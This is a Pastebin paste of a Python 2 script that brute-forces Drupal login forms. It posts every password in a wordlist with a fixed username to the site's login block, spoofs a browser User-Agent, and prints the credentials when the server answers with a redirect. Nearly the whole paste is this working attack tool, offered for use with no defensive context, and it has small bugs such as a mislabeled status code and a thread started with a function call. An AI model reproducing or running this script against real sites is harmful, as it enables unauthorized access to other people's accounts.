API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Apr 3rd, 2016
85
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.84 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2.  
  3. from __future__ import division
  4. from time import sleep
  5.  
  6. import sys
  7. import httplib, urllib
  8. import threading
  9.  
  10.  
  11. #Need to limit the threads as no limit is set(MAY Crash The Machine).
  12. threads=[]
  13.  
  14. #Add Detection to make sure login form is enabled before enabling the bruter.
  15. #
  16. def BruteForcer(Url, DrupalPasswords, Path, Name, Wordlist, Good, Bad, Debug, EnableDebugging, SSL):
  17. c=1
  18. line_count = len(Wordlist)
  19. #Strip Line Breaks From Passwords And POST Each Password With A Pre Defined Username
  20. for Password in Wordlist:
  21. try:
  22. Password = Password.strip("\r\n")
  23. Name = Name.strip("\r\n")
  24. Parameters = urllib.urlencode({"name":Name, "pass":Password, "form_id":"user_login_block", "op":"Log%20in"})
  25. Headers = {"Content-Type": "application/x-www-form-urlencoded", "Accept": "text/plain", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0"}
  26.  
  27. #Check To See If The User Is Wanting To Use SSL
  28. if SSL:
  29. Connection = httplib.HTTPSConnection(Url)
  30. Connection.request("POST","%snode?destination=node" %Path, Parameters, Headers)
  31. Response = Connection.getresponse()
  32.  
  33. #Fall Back To HTTP If SSL Is Not Availible
  34. else:
  35. Connection = httplib.HTTPConnection(Url, timeout=float(10))
  36. Connection.request("POST","%snode?destination=node" %Path, Parameters, Headers)
  37. Response = Connection.getresponse()
  38.  
  39.  
  40. #When The User And Password Are Found Drupal Accept's With A 301 Request
  41. if httplib.responses[httplib.FOUND] in Response.reason:
  42. print("\n%s Username: %s with password: %s found!" %(Good, Name, Password))
  43. break
  44.  
  45.  
  46. if EnableDebugging:
  47. print("%s Sending POST Request With Username: %s And Password: %s" %(Debug, Name, Password))
  48.  
  49. else:
  50. #If The --verbose/-v Flag Is Not Set Show A Percentage Of Completion
  51. sys.stdout.write("\r")
  52. value = int(round((c / line_count) * 100))
  53. sys.stdout.write(Good+" Brute forcing started " +str(value) + "% complete")
  54. sys.stdout.flush()
  55. c = c + 1
  56. sleep(0.01)
  57.  
  58. except Exception, Error:
  59. print("\n%s Something Went Wrong Exiting" %(Bad))
  60. except KeyboardInterrupt:
  61. print("\n%s Keyboard Interrupt Detected Exiting" %(Bad))
  62. break
  63.  
  64. #Start The Bruter
  65. def Start_Brute(Url, DrupalPasswords, Path, Name, Wordlist, Good, Bad, Debug, EnableDebugging, SSL):
  66. t = threading.Thread(target=BruteForcer(Url, DrupalPasswords, Path, Name, Wordlist, Good, Bad, Debug, EnableDebugging, SSL))
  67. threads.append(t)
  68. t.start()
  69. print("\n")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!